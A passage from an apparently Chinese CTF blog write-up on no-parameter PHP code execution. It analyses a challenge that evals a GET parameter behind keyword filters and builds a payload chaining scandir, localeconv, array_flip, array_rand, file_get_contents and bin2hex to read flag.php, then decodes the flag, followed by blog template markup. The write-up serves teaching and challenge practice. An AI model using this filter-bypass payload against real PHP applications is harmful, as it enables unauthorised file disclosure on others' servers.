class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no !&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&quot;\$a=&quot;</span>.$_GET[<span class="string">&#x27;code&#x27;</span>]);</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/flag/&#x27;</span>, $a))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span>($a);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<h3 id="代码分析-1"><a href="#代码分析-1" class="headerlink" title="代码分析"></a>代码分析</h3><p>首先对传进来的code进行过滤，若是通过替换后为<code>;</code>，则能通过第一个if判断语句，所以要套娃嵌套</p>
<p>第二个if语句对危险函数进行过滤，包括大小写，所以只能用没被过滤的函数来构造payload</p>
<p>eval()语句执行传进来的code，然后赋值给<code>$a</code></p>
<p>第三个if语句对$a进行匹配，如果含有<code>flag</code>，则die掉</p>
<p>绕过了前面3个if语句，则通过echo($a)，将code执行后的结果输出</p>
<h3 id="构造payload"><a href="#构造payload" class="headerlink" title="构造payload"></a>构造payload</h3><p>用<code>file_get_contents()</code>将整个文件读入一个字符串，利用eval()赋值给$a，最后通过echo()打印出来</p>
<p>因为不知道flag.php的位置，且过滤掉很多函数，如：end()、next()等</p>
<p>所以用<code>array_rand(array_flip())</code>来获取一个随机的文件名</p>
<p>合起来就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents(array_rand(array_flip(scandir(current(localeconv())))));</span><br></pre></td></tr></table></figure>

<p>但后边对$a进行正则匹配，过滤了<code>flag</code>，所以要对读取的文件内容加密，由于过滤了base64，所以选择用十六进制加密，得到最终payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bin2hex(file_get_contents(array_rand(array_flip(scandir(current(localeconv()))))));</span><br></pre></td></tr></table></figure>

<p>因为是随机读取，所以要多刷新几次，然后解密看看</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> hex2bin(<span class="string">&quot;3c3f7068700d0a2f2f666c61677b36643633333362392d353564302d343266312d613236642d3663666439663361666238657d0d0a3f3e&quot;</span>);</span><br></pre></td></tr></table></figure>

<blockquote>
<?php
//flag{6d6333b9-55d0-42f1-a26d-6cfd9f3afb8e}
?>
</blockquote>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       

<style>a{TEXT-DECORATION:none}</style>

<div class="share-btn">
	<a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin" >
		<span class="share-sns share-outer">
			<i class="ri-share-forward-line"></i>
			分享
        </span>
	</a>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://flag2020.top/2020/12/03/%E6%97%A0%E5%8F%82%E6%95%B0RCE/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2020/12/22/%E5%A4%8D%E7%8E%B03%E9%81%93misc%E9%A2%98/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            复现3道misc题
          
        </div>
      </a>
    
    
      <a href="/2020/11/22/%E7%AC%AC%E5%9B%9B%E5%B1%8AHECTF%20write%20up/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">第四届HECTF write up</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "LPopDsE5xqAMk1vc3LFLtBKM-9Nh9j0Va",
    app_key: "FJFDwtlxVYM7om71IEGJoidS",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2020
        <i class="ri-heart-fill heart_icon"></i> flag2020
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/picture.jpg" alt="潜心"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/game">小游戏</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/me_zfb.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/me_wx.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->


<script src="/js/clickLove.js"></script>


<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>